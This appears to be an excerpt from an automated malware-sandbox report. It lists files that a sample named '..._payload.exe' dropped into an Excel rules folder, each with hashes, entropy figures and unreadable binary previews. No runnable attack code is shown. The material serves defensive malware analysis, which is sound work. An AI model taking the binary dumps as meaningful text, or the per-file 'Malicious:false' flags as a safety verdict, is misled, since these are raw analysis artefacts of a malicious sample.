                                                                                                                                                                      Preview:<?xml...).q....H.9......."..0..R.:.L.4.[.W.Q....a(.w-(`=.s.....R.A.`m,P.(....s.*...&.H....PS..)..\.\...."..9.$..P.]l(..<U....uS....O>/H.>.6.j."...aH....[...5bB..W.....d.....F.} ...i....*.gK.b..h.<}.5u.U`.....s:.(j8...&}....N!o....H2..i....}.&..-.!:.*.........%a2.......N...Y..2....O.O.bKO.w..=.p~..X.H..&.&..}|..<6./Lj..+/.J..&5....!H.G..O!...;e.w.[..3.d...gX4.R.S=...2.j".oXq.....u7"~t.i=.....E....@.E.o.........-@.:rA~T..9{..i.8...s...2..K.:.d...~;l...4..{....c9.9)..y^^.8..<...9...:j..O..][....4........s.G...B.X.#9.....'...... ..&....g.}+..#..+...'-.J...g.Z......4......4.w..tP*.+....g.L^[&.QL.....c.V..B............~..UW......O_.6.Qf-.KZ:.C.B_...$N..<...O......6,wj..;.h..P.#.....6...-......e.v[L. =.5......*`$.......wF^...J......Mp.7c.._fj..i"ng..<_.. ..(h.z4.[}.J[..X.n.......Q....\2......dO.....x..[`g...=.h.H..q..d...~=._.!S./...#.r.n...5.:.J.k.....yIJp.^fZ8..i.....=..p"..=...C#<g......P!.+......._TR...r.,Ue...N4..$.&.Xyh..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10819v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8769
                                                                                                                                                                      Entropy (8bit):7.977611524744263
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:DDl8sa8gCvj6TATCD0EqyllVG4P8MC8Hx3JI2AFcM:Dh8stgCv/WqKlVPPu8HxdAFcM
                                                                                                                                                                      MD5:CA14A8968F75F26661E51BF45BD5D4AC
                                                                                                                                                                      SHA1:92695FF94C29BB289A3F2CD46D6FF71994D01110
                                                                                                                                                                      SHA-256:268D5CE8F8C49295FD7BC5AC7A94E5D982180CF14D6911D82174F36018B732FF
                                                                                                                                                                      SHA-512:E774AB77B78DB7A0AF48716D673E3EE0C901C7E1D256DE88B1BF6D002D46F44EEDE9A6CF74B25E4F280529338212C9349D4C54BF8B7EA3DEEB87463901DA866F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlQR.e....&..)e.#.....{tt]P.O7..M..fkU....M.D..p..u It.6.c5.j.W]...6.*G.V..i.U_..P..[U..V.. .[G(o...w7Q.Z>.....%..I#..}.D..5\..e.(.\).v.....:..3...6.$..MY.Y.N...A...d..t....x..1..........!P.64..~..=.kR..3.r>.........+3..]o........~......(.pg8.6....j..FE..J}).?...|.............`........(.#..l.[.E..'x.aU@.h`.P.a\t..r..=d......C.xx`...`t..[....C"......S.Xufi.].;..Z..G.rj.<.....c...1$@y..jF~...s,.....U.F....Cy[...<x.Zh..z..Vi....o..+......s.."..:.A.E......N.z.-..Qj....X...<;_........N.6.....j.M...A... .vd.VC....I......#..{............:....+~.yl#F.-.>.s.=.e........ 6.O....&x}..V..i...e...h~..m.>..I#J!g....,.xo...=.lp.LV3.%..i.HZ..+...t.....E.?*...0r7D,KY./+..fs..Vzc".9..w...}jl.~.-......../fO%'..X...|...?.`.}...&K.[2*.xmw.....w.........3{..c...P.?d"..$e2E...uC...;...5.J0]@.....r..3+..%...3.w...?.t...1 'RQ....4p......_c..].".....X...).mY..J.K..8.X.g..k.............$.8.X=/Q.iz...@.MTM...2>.A.q.....B.t\..........._..)1..r..x.n.b.\......+.A..K.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10820v3.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):5842
                                                                                                                                                                      Entropy (8bit):7.9680020665479825
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:dGdm1wE98uIZlbNTXTf486KuhZegwo67NFI8rHJQqW0fIwvG0JDmOhCtICiI:YmrwlbNrU1akWNFxHCwvgOhUiI
                                                                                                                                                                      MD5:D1293B938D6DF063165933C9F57AA411
                                                                                                                                                                      SHA1:838FB27E18CA7D61EEBF04BBECB51E5C0B18BB81
                                                                                                                                                                      SHA-256:30D7ED6D1424BFFA868BA575AC6FA7864E99E221E95E6C28F8B1A0902699198B
                                                                                                                                                                      SHA-512:397E2BF4F7F65D4CAE39A03D9E8ADB5BE82A5C51F995E8511FBF23721AB59D6014179799F7532169DF17E4AFD0079B81F239727FD81408FCA383458BE609B42A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml"^.M..:"..[..5evA..i2...>.k.-r.2....y...D..>.#..%.r../..L..8z..k......a8Q../...i..P&~.y..(...h....U.s...#/I%....e$>..bI...=.f.@'.HE...v.Jd%W.@..v..iI.6.W[.......M.l..f:.2.....>.[.~..P0K..s%m.(&@.1"^_!0H.J..j.U.&l?...e\..H.*.$3.......2#.....D....=..;C..@...g..X.[(.e._7......M....o..i....}..G7,.......&..-/......B.;...#..A.."..pZ..oSi..(X...k.8.-m).......D....}f.\......V.D...j..0.j.7..M.~.+..Qm...n.OE.!6..9.;....h.<..1.."V...../.J..V.s...BM..T..w.....h\5..%s....De.*....2h;...Y..-...9Z..._.....(c......<.$QW...uO... . ......SY..Tf.X.zs.8$d..y8../..[.{b`..m..I.;.....!T>$....yE...[.v....S=~x..aX.....P..%..@..v..Fo.vrR:.7.......r3.{Yzmdg..Ce3."_....#.STluj..NA!.S=.44y:...r.D....\.sj..>.....5U.....D~.k. .......)@V...Q..+.....[2..=..%:`...VfV....8*J.L......R.?...U...|.e..w|(.....Z...0y0...W.*.R..f.a.`.^..7.z..g... #$?I.?.]1..d..V..>4h..,...@KCd..L...M."w:.......9.1H..FXR^...y.....%...I..!e.<[@.:.lD.I".]!t..\.u../..0q;....1.(..5v.I.|....*.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10821v3.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4787
                                                                                                                                                                      Entropy (8bit):7.962896211323934
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:p+UiZlPfGAMvaZWKDhaxF/rSAQPDjMd3GzoEO5UOX7af3VTKugQ8rJ2X:kJZlPfGFvajhaxZY7EOOAFtpX
                                                                                                                                                                      MD5:8F32637F6379B60E86090C9752AADBF4
                                                                                                                                                                      SHA1:39F1CBAAD8E8283B0AE85DD5E6EFDA38F16C490A
                                                                                                                                                                      SHA-256:FCB87EC5597175505B4770A6745C79CA07B3C25D105E9A788DF29BF10E651046
                                                                                                                                                                      SHA-512:C99DC3269A0B8F3D562CF3EB0FCD7055B4E5339F9E28D28DDC105FB454EA234A1D3897F368973355C2AA50B68E081C6243823C6473AD503602E6ED735ACB8B8F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.[u..XO.....A.$... ..x...xB.gl.n....&.......a.<......d....Nl1...j.t{^..am\.#..7..F..`L.......(.@|v.q9.m....^....&.5.$.8...L.Ew.5..j.!y2..Y.oIh&Nv...T....=.JZ.z...je..aO .&...o..V.)...`L..T.qf... .8......O]?;....f..-..H&=..T..@...........F.p..B.....$.`.v)atr_.....v.\....C..Ld..).&...8..x...0.al._....Z.W.,.V...9iea...Q..W.5.d,..3.e}.g..N.g./....L...b*...].fx.m...\.RT/...%hw|Y.-Mx. .w-z.~a...k..0.-.....w4..kH&>.'E.M..W........q..OE.b.....m]z.g.\]. D.p..... J.....2"g..|&..%^.;...Q..f.^n.C......F^...5..?......Ie..V...y.....[..(X.w4,..-....f..8v.y_-.E..G...k.".....y.. b..l.U.1.,Yz......z.wN.I..-.._.q......G.1F.6....L.j....._3..-<c.Vvq..t.V.....%.w+u.....dL.^..p.....;...7..T..R:h5..`.....9..P.."d..D..........=.JC.......).DZZEJ_..!.,!.z.^..?.C...c;.LP.4..C.>..}.....z...1+P.QL.......;Q.j.....6a..1.xl.9 .........~X.a0.l..r$Y..*.I_..S...qn..O`...X.H9.#6.f.....;.....H.`......@!h.....7..3....:(....^.....G.X..,+..[.z.?.ga...,.......uyC...28.T."

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10822v2.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4786
                                                                                                                                                                      Entropy (8bit):7.9607388782901145
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:qbaK2Yhu0P+6wVVLxqc1nolHa0ySDV+2iryFgz5:garYhF27hxZ66SQzp5
                                                                                                                                                                      MD5:48802222D278662B78C0487191BC4D3B
                                                                                                                                                                      SHA1:4B3076CEFAC9E219E88DF4BD13F08EA866E104DF
                                                                                                                                                                      SHA-256:1A036AC0A3A8EBEDD045B3FEA01C6FA184E7FE47F47AAC39C35FD9B0C9E78B66
                                                                                                                                                                      SHA-512:C23BA09CC7BF9B917E18B1BE6CAECDC5C5FC7A47A5E0BEC23F1FD3577D2C842E43026266C70C0573546418AD3D4912DDED47E7A6E1FB607928513AC3D2CA5783
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml?.-..Z........@>..z11Y...M....X..v'[...;..Z~[.Y...r.?5..y.b.....Y...{..T.].O.i...L6.....e...RA.|O..u...._...Y..h/..Rn....5.o.D.0D...U..f.:.Nu...Bo...JW.+.f..@.(.......w...F...dQ.Ju.....I..hD. ).J./$..'.Q.<.}...DL.P..4.....^.}#&......%....I.hj....gY.;...e..-'D8.S......u.b4..z...^}L.s...$d.."]H.....2.W&\+...N.....]].Q....o.....J.B..+.f._.O10...x.H;.VJ...&LA.G&+P`....O...)5.../..l....].4.$b-0.'..(.....:./.7...eJ'yX...Yb.1.O.0<..d...I,...|..)...f...5..k.o.......]...=l'.......Ir..T$.j.v.H!.Gy..g..B..rbt....L=...@%z^!.[.......8..C..R...:....)..N%.....&..%|....y....).@.....'....2.+.z./Z..].|!.7.0.*.........*.pvh^........$.......|N...q@.Wj..C];...@..L..p.n@..l}.x.@..]...S2.,5..+h.5...z.;...X.d..K....F..?.WF.......y..j~..%..u..3.k..W#$..9...W....j...A..\?3.6-N...e.M...".'..l({"..L0../.'=.~..G..SuM..D....>.....6.....1/....a.5.x.he*............>. /..#..o...OT.......V..#u...P*'g.../....Q.;[M....F.;9..`.@.=..X^.;C..yV...Ru...i...x.o.AHr.q.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10829v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3030
                                                                                                                                                                      Entropy (8bit):7.939134789727182
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:hllHBHQU3+sVj1gvcBEM/4imOnTgZkpbRBscDEkaGmVtP9FHmS+H3eCKKDSegU6e:hl3HZ3+sVuTeKcgu1BHm/909XetKSq6e
                                                                                                                                                                      MD5:639D3F6977647EAF28C70BCF7999DDD1
                                                                                                                                                                      SHA1:63566E57DB39201516AC820EFDFE02ADDF7898FE
                                                                                                                                                                      SHA-256:CC941DA545E9BFD2595B0F555AEBCF12BB30642634A022D0FBD22E71CE482F95
                                                                                                                                                                      SHA-512:5A22FE7241F8061C068CA7E315ADD4786FAD1B0292DEC3EDFA3EA49973E5A4C951CB19BE2AB51C5ED81048AA907666547A025E3958988534C477B0FBDDE610F3
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.> j....[..q....1....m......:..6gD.I......U.e.....K.....R..+._...e..E.g0}&.}.n}:.{.-.G..I.T>.h...h..%...; (.....5.'z...1.(..A.(+V....r..........C.lm=iF%.yS.4.lS....X...c..$..zx..?...Rr...|]..........Ns..e...kw/S;.]0Ou..L.)6ji.@..+K.m...La...Se....9.......0.2.-...._}s3...$@..P...).S.Y.?...l..I.MO@..../.....[..9......E.....2.,....c...Z-...f...\.H....M...&\..R.Y.......R...$g.mS1NB..x...*...e.;(.wm?Zu..F-...R.Wr.1.W...7Q...l....s$.q...E.v...r.......=OC........1f..H..yI.>.V...,..,$...s2L..a..(C...... ..2k..e.lw..e.f......?9C.]..:F...............}H....E....h%..)....#d.'..p..K....U....i.x1.....3.....*...i..8._.89...T.$..>/#@~.&.p,...j.Yb..,Zh/.?.....}...~.r<!.Q....z.=>.V..]9m..h=.....pZ.U2A/{...1.5....auZ...\C.x:.x.t.....y.F.....j.H.........do.HG.~...fMje-nj6.[...x..@j...(K..K{Z..nN|..rn......"...U.............x....Q...f......E..n75.G....`-.4.vQw.9l......>=.."...'.<.J..F/..i.2?.........5.g....V.$.V..vL.H.........|K..@..&N..}..R]...etut..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10879v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):789
                                                                                                                                                                      Entropy (8bit):7.724459140734728
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:4RGscSYAbXPtoMPj1lmQ7q6AfLa9HgnMrlOUrsr2adH5SUdNcii9a:QGCDLTZlmuq52eqBNatM2bD
                                                                                                                                                                      MD5:1308EBF06E0ABCCCBC572F3A6E3A68B2
                                                                                                                                                                      SHA1:A26974EBCD8CD2E67B940597B45B2A08FE907B45
                                                                                                                                                                      SHA-256:97865BCED7E82277B96C104BFAB1E1803E6B7C3231CEB7664F98EB727AF3B6E7
                                                                                                                                                                      SHA-512:D131D4F1D704E1A0CE0B8D32AF3DE9F72F5DA56F55DC4700492961C0D69A4EE78994A2CCED406909D4FB3256131212F7228337A11B55471FCAA48BC9FF978C67
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..(...m..d.2....`.-.|*qP.ni.1-...H..O.|[n........Z...V....).'.......\..E:.d^.....u..D8...Y....*.u.HC.H....~=.........!iI./..Dk....1+.@.v..Mg9*L..q..+..... BH....E....= .^.)..6.....-.6.Y2...c?.c.V.Yo@P.d.d.f..6.1/.._.c...B..Q...F^....v.v....v.u..o.s...z.Mw..&.Le,..0....b=<K.0.".:%YA........V....\..P...,t.+dyWD.v....x.!i3'.W....U..J........!.bR....D....'.'I.v.j..1.2MR2_...i=........+y..X3.t...T~)P+Y-R.:B@....r#hT.:..0X.......g.....(L..k..g3.....Z....>`rp.4...o`.%....)5*.+S....E...%t..p.:...*n.o..Q.c_...d&.[w..tK/`...G..{.G*'.........X...|K.&tV..K....Z...s.r..").f.Kim.+.a..5NN@.x.u.4.....A.."..q.o......;...?C`...A....Z...v..-Y...r..$.....OR...a....+...z..J<..G1p...smMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10880v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3017
                                                                                                                                                                      Entropy (8bit):7.937085566458132
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:u3TGjuz1sydbc2I7KzTxnLGlRhaFQORtBWax+7KZqihVryUncYpD:u3Caz1T/fhLghayOtzx+7mh4YB
                                                                                                                                                                      MD5:F4CF156376F4D741334BD844B2C806A3
                                                                                                                                                                      SHA1:B3F6415B5446685E9C972373B1E48E54E345B779
                                                                                                                                                                      SHA-256:420EA90AF31C6EF9DB376BC76B27965C28B08D08603306F2D384442C47D47474
                                                                                                                                                                      SHA-512:0A95B9937F0261E95B17B1E5F0ED4116DCAE236E7C8212A75A40D799F81415424AC6BA3B48082040FC361C10182B765266B25AB9A9C5250690DD4BA60E290C6E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.3..`|......<u.'.L.-...C...I......|....-..C.D?...dQNlp...e...p.\.......V.O.bS.yn....$.|A~c.P]X.y_....#.A....[\X...I9K...Q...}..P{........fFA..l.R..y..}B...*E..7..9jv.7O..C.vK..{.K...wY|.;....O7N...J.G.K.vN..R]..=c=.......p....U.39el>...p.kw9....QX]Cy'..6\w.s...i..U...x..&.A3.<o.G...... /.....7....Pr.V.........-.7.(%..B.O.N..).5J...t......D.nrTW.3)X.....N........@V.h..HU..`../^BH.r..4J. ...8.t...x.B=.}>....N....).M.rZ_....:.]..)7...o.w5m..|..S.t....W.pNw..8...e.....3.m..T....3C...P...i..c..U. .....8.\3.C........Ht.(.:(.d..KF\[.j....~......B.]..+.X.W.$.....uh.%.<.[..\X.i.1.9.....'}..K?._.4.-......&..B......G...i....-?k.:&..h........Z..........iMHp.&.......v...7.X&..B.4.....O:....E .........}.;...`.b....o....A...........:..]"T.c.c.f.8.P.' ...c..#../kun.O..(R;8<N..7.........B1n.7.!..5R..f..TS.G.c6,z%..8.l.J9.@M.j....&6.#.g.`.j.h....?..4.....R..^.......x .ut.V?.@.[....X.k..p....v....D...I'w.5Z......{mub.'.n.O.Z............45bmR.-.B..y.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10881v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):823
                                                                                                                                                                      Entropy (8bit):7.74331656335782
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:pmnsjzCzku05lfJ3OQYhShuUew6mTeU/fQ6uv4d3Lcl2bD:pmsjFBJeJeuUh6mTer6uv4JnD
                                                                                                                                                                      MD5:151233F53B6FA85EC397CFBF6437B5E8
                                                                                                                                                                      SHA1:B9769A2054D1993D845ACF8C18DB1DAFC25EE9C5
                                                                                                                                                                      SHA-256:B7E956F44001DDC02E9A55A011E47FD7727390B6190B03D8FB0EA8ED5CAE710B
                                                                                                                                                                      SHA-512:A1C0C63A06C3501454B51B507F6846487DE6631163E4B6644C51E533A0523F3EE4DCCB1AF5C946EE6C201AB5F6FA12C699B144A0B2C1E1789159E21755FDF381
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.{....u(.A...>T.....@q.w.."h....]..}5.S.._1...M<.m...i..n.....I..A.2..q..t..wQ4..ymt...f....^O.Q....T...M<I..W.....\w..g ..t.3.....d.%.A...........XG..Eb.4Y... ...c.W........+._.T...p+nP..b.F... .Y$O?.W..t.!.3.ih.}.2......e...7.3..c.7.-.A...../...D.....`..".......).+.F..xM.S.q.F.k.T.fh.Jjj.X..K$......}...e.......'.....l..,......2.4.....A!'.....6.s.p.d.A.2.>2..09......l....FJ..= .G\..x@- .Q.....b...2.k_B=....'..qV....;...`......D..1Z.X=.mW....)...E.3..h...Z.T..!a^.Y..a...p.q..o.us..w;....|.y....0.qA.._....>.|.2./S./l.K.).)....b..4-..!..v\....}X.7..HY.[..J.....Q.=.t9....s:4...|...(.*.W.!..o.]+G.5.L..H"...C.?...........c.-..![....\..8.......l.l{...3...../....!...(..U.s.I....#..%.;7....A....`!P.j.....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10882v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3017
                                                                                                                                                                      Entropy (8bit):7.930972076634297
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:xA8uVr0jGnrs6P0eQDPcQPaOUhf+G9n1PxeFjQRnQ/F8DBdz8WIgid9cEhDMoCSm:xiVr1nmnDPzyNhpnhcpN/F8ldtIggGYW
                                                                                                                                                                      MD5:977BF1A6913EDBF26E19B1DCA75BB81A
                                                                                                                                                                      SHA1:9FE651CE833708780ADE093BC9B81B007BA9FFCF
                                                                                                                                                                      SHA-256:74AAC86549A3AEF7115A0CA4451F997EB57C46D192C1ABC27A96816D29CE68ED
                                                                                                                                                                      SHA-512:EE539557E861BEEE0D8B185BFBD34DD042A8D775041F16D706196D722FDB97EE632D6DFAE2FF4E97486D416DCE9AB1BF8012DC6A32010AD075D65CFC9C422ECC
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...L....i.(U.q.......J..f..1C.......]......nP.o.....-.C......s..b.0.7.}ZM..49..S.o....9S ....Z....@d.@....#L.;.U.. ....CY|.mG.>.>.@.q.j.T..a.F..19..+...M)Q...*n....0............sGyTi..w...J2.b28...pd..b.%C.9.X.L.......%`.yu.%.....A..t^\.X.,.2.I..N..E..ja...6@_.Z[.$....,.#..o.-.....@..h..N.@))e...?.*..H~..B.)..6..w!h..JD..ZP..R'...7...W....%:.....;01.a.V...,..H..jzL.vw..G.i.#.`../........b.d...............1D.+.,.v.:8.ZD.^}....I....x..9.R..^emy@U..V.s..IZ)...8..Qa..-R.FH......j..~J.FE.pa{C.hlE.M............o....9|..g!...b.UD.IQp...\..P.%'..kA..(..Is.FQ..,..5..TS<.o...V..jI./......_}...V.+..k)...9..R..w......&..0J..t....@F...g.....1..{..q...........}.ng.......S...r..^.F..U.....v,(.w./x....`...$...87........Ae.o..../...$iq..M.'..2.)D......o*<.a.E.nM.+...i......s.-.F....Iw.n....nL..d.'...dY!. $B6..qH.u....U.....C@Z....qZ.o.t..{dsC..l..'...`...w.D....N=.p..@.x`.?.A.a.....^.........4p..g...._Z.u....|q3..d..F.Wr.r..{..c.?..c...Q6.U.._.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10902v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1021
                                                                                                                                                                      Entropy (8bit):7.817084440420642
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:s2AUGMshUhl+um5n2QBSwDkUviPa8VP9uO2f022bD:hMMshsm2Q7kpPHVP9ud09D
                                                                                                                                                                      MD5:2989993BEFB5A87AD7A7FE2783FFA2F9
                                                                                                                                                                      SHA1:BFCC8C996A30D3F4F1989ABB26981CDCAC4E7529
                                                                                                                                                                      SHA-256:BE7D157673BB8316F375B034CD3238EDCF692341BC28300F05A64F752E4B6C8E
                                                                                                                                                                      SHA-512:3FE113E281545874D74C83EFFAA556ACDFC2E16F3024E213BB1E3AA9452F24D63CD1F3920DC42835BDDBF3969A10613F00C3F8866CB1F16A38AC5CA1BB9214D0
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..&A.).<..i.H.......Z.!.]&.#.....4......8....`..L....B.zN....2.~..:J..sxX$L.9M.Q"...........?..qM....mR.SY.......!W..>W...Q...v...*.jYg....Z..'.5.y.s=L..5K|8....."...]*g.C...|F...Vo.2E..D...8iA._..d.....3.Ljq.(..e.C4..."+.~.'.....X..`.}.|.@.-..hX1..a.-...BK#.\.G....k.GD..q...f.._P......#.........m.......]...=.%.U.N...6...1.....`.....(.i[.......6..F.....HD.4h >.hK...!..g...Y.b.~...AlcU.&...T.2l"..~...l?...\#.,....t.......D.H."GD|.................v|:VS.$.(Eu..$.+@klLl.;.+.#....=..uO...v...B..#.[..9;....tMf....[l..h!._EO.Qn.....U$..D........v.a.5... ........=..*....@.#...U...2'x.lS]*.....r.4f.HK^Q..R...%G..x......~..........u4."1...k...V........f;..i.8.l...(Fc...n...)S.D..(.%{.!.......f..T......5..Gk..j...^..3.).X..x.Y*.).)>.....7.....kFA.s....~..].Fq.Nf.]E.Q.....4c..@....@...)...O...6.....[.$;u.d...Z7&..../?V...A..5.=++.6......h..e.....*.:.....1..-Iq.XL....n....C....9.M\h.q-..8z.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10906v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1398
                                                                                                                                                                      Entropy (8bit):7.858893408850717
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:J4Lbrsw5yvQyCzwNjoBEsiHfDqzLzOKZMxbndx8QKHrL8Hxoxl2bD:qTUoyhcWsk+Pbs8Q4rQH6x+D
                                                                                                                                                                      MD5:35581780462FD9A9961A922FA8F72055
                                                                                                                                                                      SHA1:75034CF27D5E7D3E1BE24B7B0614591F45BE3CF8
                                                                                                                                                                      SHA-256:E87A0E77008B07B99956EBF9733B2067896A496932CC2444CC90917BFF477CF8
                                                                                                                                                                      SHA-512:6AD258D289D93E5434CDB40C259F6D3FF21FE8DE075100AB0355E8A40466CB4E7B87DFB8A98095101B688B9483ECD8AD95F556400837376E5462F1130EAD6944
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml7B............. ../.R..`(.c.jP...*/|z..L)a..k.DX.....Y_,.s..~....L..;"}.{/Y....kX1..AaK,..z.X...0).#...T.7.F. ...d........O.O.5..........$. F.)t.0...0.N .....!7.......(..0.i..k..#[..@.@[.... .o.}J...r..[D..r.SY.O...;....R.3......H.).UQ.Q4.F..)....B~...F.D.q..ce...u{.....E...!...6....V...&%.....6&:...-......`>z3B0.....b..)>..^.B..[>.l%a,. [e..c..4{...:.".Fm...(....L.....l.B.@_#..| $.......f.......`...q.nwZA... .....TYfz.k....<....=..\h.Mr.u.>..Ud....M.Aj..02..IH|.....,-~FY.G..@.Z.Z.AC...>*=..Y.D.J.@....S.~]]Ez.G....lA._..$..J..g.'..Vb..}P...DFk.O....iZ[...U.g.QH.#.|N...l..k.......P.d..1.H.}...X.&p.t..I*.4....3..C..84~.E...Y..u....:...79.......Z.]e.N..i....!......FmE....Fs.o.D...X..p..k................w.|m~D..YJ..H#.S...5.j..f.+..LC....u..y...A......k.\...-.-Q-...-@..a..,..5G.W)...mz.!..,\.....:....... ..N.W ..y...^..(Q..d7......8.tw...d.h{u.....mB..l}...R....Z......o.Q.87.....S...!..9.e......U..|..E.......U.2n..K..p6....^!2..l.2....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10907v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):937
                                                                                                                                                                      Entropy (8bit):7.778072573986199
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:PNITMnljfgYnKrar4HcA77F+r0q5Vn7RU4VQW2bD:PQkfieUzN+ZqTD
                                                                                                                                                                      MD5:A29CD34B6F7CADFEC9022D8744C87C55
                                                                                                                                                                      SHA1:4CEA516D407566C30774CF97A976FEB166736FAD
                                                                                                                                                                      SHA-256:CEA24740B4789D5D1606DFFFE631746CD9F6ADA5AB014039CAC995F9DA1F2820
                                                                                                                                                                      SHA-512:F5473446F9BF5C41CE89054BE4BBC01CE05EFAAF1501C59B16959691D818F1589FDA1628EC4B9F3544B935A396CFC77A2DB65D46CE1B07A86FBDB0737F96FC98
                                                                                                                                                                      Malicious:false
